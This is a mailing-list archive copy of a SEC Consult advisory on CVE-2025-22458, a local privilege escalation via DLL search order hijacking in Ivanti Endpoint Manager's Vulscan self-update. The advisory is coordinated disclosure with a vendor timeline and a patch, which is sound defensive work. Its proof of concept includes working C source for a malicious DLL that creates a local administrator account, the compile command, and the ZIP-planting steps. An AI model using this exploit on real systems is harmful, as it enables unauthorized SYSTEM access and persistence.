| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <AS1PR07MB8431BBC56E0E3BBBF556D408B38BA@AS1PR07MB8431.eurprd07.prod.outlook.com>
Date: Thu, 8 May 2025 08:39:24 +0000
From: SEC Consult Vulnerability Lab via Fulldisclosure
<fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Cc: SEC Consult Vulnerability Lab <security-research@...-consult.com>
Subject: [FD] SEC Consult SA-20250422-0:: Local Privilege Escalation via DLL
Search Order Hijacking
SEC Consult Vulnerability Lab Security Advisory < 20250422-0 >
=======================================================================
title: Local Privilege Escalation via DLL Search Order Hijacking
product: Ivanti Endpoint Manager Security Scan (Vulscan) Self
Update
vulnerable version: EPM 2022 SU6 and previous, EPM 2024
fixed version: EPM 2022 SU7 and EPM 2024 SU1
CVE number: CVE-2025-22458
impact: High
homepage: https://www.ivanti.com/
found: 2025-02-07
by: Paul Serban (Eviden)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"EPM Patch and Compliance Manager uses an auto update feature in order to make
sure that all vulnerability scanning files are up to date with the core
server.
This ensures compatibility between the files and the latest definitions as
well
as compatibility with the files on the core. The Security Scan (Vulscan) is
what does the update."
Source:
https://forums.ivanti.com/s/article/About-Patch-Manager-Self-Update?language=en_US
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.
Vulnerability overview/description:
-----------------------------------
1) DLL Search Order Hijacking (CVE-2025-22458)
The EPM Security Scan (Vulscan) Self Update is vulnerable to DLL Hijacking.
When it is installed on a client machine, by default, it creates a scheduled
task as SYSTEM that when run, tries to load non-existent ZIP files from
ProgramData. A malicious DLL can be inserted into one of the ZIP files which
will be unzipped to and loaded from Program Files (x86) allowing malicious
actors with low privileges to escalate to SYSTEM and due to the recurrence
of the scheduled task, also gain persistence.
Proof of concept:
-----------------
1) DLL Search Order Hijacking (CVE-2025-22458)
In the screenshot below the scheduled task "LANDESK Agent Health Bootstrap
Task"
is seen to be running as SYSTEM on the client machine.
<01_scheduled_task_as_system.png>
By default it is set to run daily at 9 PM.
<02_scheduled_task_recurrence.png>
This scheduled task runs the vulscan.exe binary that scans to make sure
that all vulnerability scanning files are up to date with the core Ivanti
server.
<03_scheduled_task_command.png>
Every scan run by this agent saves a log in the following location:
C:\ProgramData\LANDesk\Log\vulscan.log
The ProgramData folder allows any authenticated user to read and write
into it. While reading the log, the following lines indicate that some
files are not found.
Thu, 10 Feb 2025 21:00:19 Info: Core did not find file
RebootBehavior_Apply.zip
Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
Thu, 10 Feb 2025 21:00:19 Info: Core did not find file
AlertSettingsBehavior_Apply.zip
Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
Thu, 10 Feb 2025 21:00:19 Info: Core did not find file
InventorySettingsBehavior_Apply.zip
Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
Thu, 10 Feb 2025 21:00:19 Info: Core did not find file
ClientConnectivityBehavior_Apply.zip
Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
Thu, 10 Feb 2025 21:00:19 Info: Core did not find file
PortalManagerBehavior_Apply.zip
Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
<snipped for brevity>
Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find
"C:\ProgramData\vulScan\RebootBehavior_Apply.zip"
Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find
"C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip"
Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find
"C:\ProgramData\vulScan\InventorySettingsBehavior_Apply.zip"
Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find
"C:\ProgramData\vulScan\ClientConnectivityBehavior_Apply.zip"
Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find
"C:\ProgramData\vulScan\PortalManagerBehavior_Apply.zip"
Thu, 10 Feb 2025 21:00:19 Self update: files are up to date.
It looks like it is trying to find certain zip archives. It first
searches on the Core Ivanti server, then it looks in the ProgramData
folder. Since it can't find them in either location, it concludes
that it is up to date.
Further down into the log it can be seen that it tries to unzip the
same zip files from the ProgramData folder. It can't find them and
then loads DLL files from Program Files (x86). These DLL files have
the same name as the zip file.
Thu, 10 Feb 2025 21:00:20 Checking whether to unzip
'C:\ProgramData\vulScan\RebootBehavior_Apply.zip'. Force: true
Thu, 10 Feb 2025 21:00:20 GetFileHash: could not find
"C:\ProgramData\vulScan\RebootBehavior_Apply.zip"
Thu, 10 Feb 2025 21:00:20 Loading applier dll: 'C:\Program Files
(x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
Thu, 10 Feb 2025 21:00:20 Check last error after load library. Error: 126
Tue, 10 Feb 2025 21:00:36 Checking whether to unzip
'C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip'. Force: false
Tue, 10 Feb 2025 21:00:36 GetFileHash: could not find
"C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip"
Tue, 10 Feb 2025 21:00:36 Loading applier dll: 'C:\Program Files
(x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:36 'PreApplyBehavior' is not in 'C:\Program Files
(x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:36 Calling 'ApplyBehavior' in 'C:\Program Files
(x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:36 Checking whether to unzip
'C:\ProgramData\vulScan\InventorySettingsBehavior_Apply.zip'. Force: false
Tue, 10 Feb 2025 21:00:36 GetFileHash: could not find
"C:\ProgramData\vulScan\InventorySettingsBehavior_Apply.zip"
Tue, 10 Feb 2025 21:00:36 Loading applier dll: 'C:\Program Files
(x86)\LANDesk\LDClient\InventorySettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:37 'PreApplyBehavior' is not in 'C:\Program Files
(x86)\LANDesk\LDClient\InventorySettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:37 Calling 'ApplyBehavior' in 'C:\Program Files
(x86)\LANDesk\LDClient\InventorySettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:38 Checking whether to unzip
'C:\ProgramData\vulScan\ClientConnectivityBehavior_Apply.zip'. Force: false
Tue, 10 Feb 2025 21:00:38 GetFileHash: could not find
"C:\ProgramData\vulScan\ClientConnectivityBehavior_Apply.zip"
Tue, 10 Feb 2025 21:00:38 Loading applier dll: 'C:\Program Files
(x86)\LANDesk\LDClient\ClientConnectivityBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:38 Calling 'PreApplyBehavior' in 'C:\Program Files
(x86)\LANDesk\LDClient\ClientConnectivityBehavior_Apply.dll'
<snipped for brevity>
Wed, 10 Feb 2025 21:01:42 Checking whether to unzip
'C:\ProgramData\vulScan\PortalManagerBehavior_Apply.zip'. Force: false
Wed, 10 Feb 2025 21:01:42 GetFileHash: could not find
"C:\ProgramData\vulScan\PortalManagerBehavior_Apply.zip"
Wed, 10 Feb 2025 21:01:42 Loading applier dll: 'C:\Program Files
(x86)\LANDesk\LDClient\PortalManagerBehavior_Apply.dll'
Wed, 10 Feb 2025 21:01:44 'PreApplyBehavior' is not in 'C:\Program Files
(x86)\LANDesk\LDClient\PortalManagerBehavior_Apply.dll'
Wed, 10 Feb 2025 21:01:44 Calling 'ApplyBehavior' in 'C:\Program Files
(x86)\LANDesk\LDClient\PortalManagerBehavior_Apply.dll'
The Program Files (x86) folder already contains all the DLL files it looks
for,
with one exception. It doesn't contain the RebootBehavior_Apply.dll file.
<04_rebootdll_missing.png>
Because the zip files in question don't exist in ProgramData, a low privileged
user can create them.
<05_maliciousZIP_lowprivuser.png>
The RebootBehavior_Apply.zip file could, for example, contain a
RebootBehavior_Apply.dll that,
when loaded, will create a new user and add it to the local administrators
group.
This was the chosen zip file name because it is the first one searched for by
the scan. However, any of the other ones can be used. The DLL will still be
created, the only difference will be that a second scan will be required for
it to reach the stage where it tries to load RebootBehaviour_Apply.dll again.
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
void Entry() {
system("cmd.exe /C net user secconsult P@...0rd1sSup3rS6curE /add /Y");
system("cmd.exe /C net localgroup administrators secconsult /add");
}
__declspec(dllexport) void PreApplyBehavior() {
Entry();
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID
lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Entry, 0, 0, 0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
Notice the "PreApplyBehavior" exported function which just calls the malicious
commands. This is a required function that is searched for when the
vulscan.exe
tries to apply the DLL. It was compiled using the syntax below.
i686-w64-mingw32-gcc poc.c -shared -o RebootBehavior_Apply.dll
When the scheduled task runs, it finds the malicious ZIP file and successfully
unzips it in 'C:\Program Files (x86)\LANDesk\LDClient\' and immediately loads
it.
Tue, 11 Feb 2025 21:02:52 Checking whether to unzip
'C:\ProgramData\vulScan\RebootBehavior_Apply.zip'. Force: false
Tue, 11 Feb 2025 21:02:52 Unzipping
Tue, 11 Feb 2025 21:02:52 Unzip
'C:\ProgramData\vulScan\RebootBehavior_Apply.zip' to directory 'C:\Program
Files (x86)\LANDesk\LDClient\'
Tue, 11 Feb 2025 21:03:03 Successfully unzipped
Tue, 11 Feb 2025 21:03:03 Loading applier dll: 'C:\Program Files
(x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
Tue, 11 Feb 2025 21:03:03 Calling 'PreApplyBehavior' in 'C:\Program Files
(x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
The malicious DLL file was created as SYSTEM:
<06_maliciousDLL_created_as_SYSTEM.png>
Checking the local users, it is confirmed that the new secconsult local
administrator has been created.
<07_secconsult_user_created.png>
As long as the malicious RebootBehavior_Apply.dll exists in
'C:\Program Files (x86)\LANDesk\LDClient\', the scheduled task will try to
load it each time thus giving an attacker a stealthy persistence mechanism.
Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available
at the time of the test:
* 11.0.5.2795
Affected versions as indicated by the vendor are EMP 2024 and EPM 2022 SU6 and
all its previous versions.
Vendor contact timeline:
------------------------
2025-02-13: Contacting vendor via email.
2025-02-18: Vendor confirmed that advisory was received.
2025-02-19: Acknowledged the vendor response.
2025-03-04: Asking for a status update.
2025-03-04: Ivanti is working on a fix and testing it already, but will
not make it as part of March Patch Tuesday.
2025-03-24: Ivanti has developed a fix and plans to release it as part of
April Patch Tuesday disclosures (4/8/25).
2025-04-08: Vendor publishes security advisory
2025-04-22: Coordinated disclosure of security advisory
Solution:
---------
The vendor provides a patch which can be downloaded from the following URL:
https://portal.ivanti.com.
Vendor Advisory:
https://forums.ivanti.com/s/article/Security-Advisory-EPM-April-2025-for-EPM-2024-and-EPM-2022-SU6?language=en_US
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
X: https://x.com/sec_consult
EOF Paul Serban / @2025
Download attachment "smime.p7s" of type "application/pkcs7-signature" (5112 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists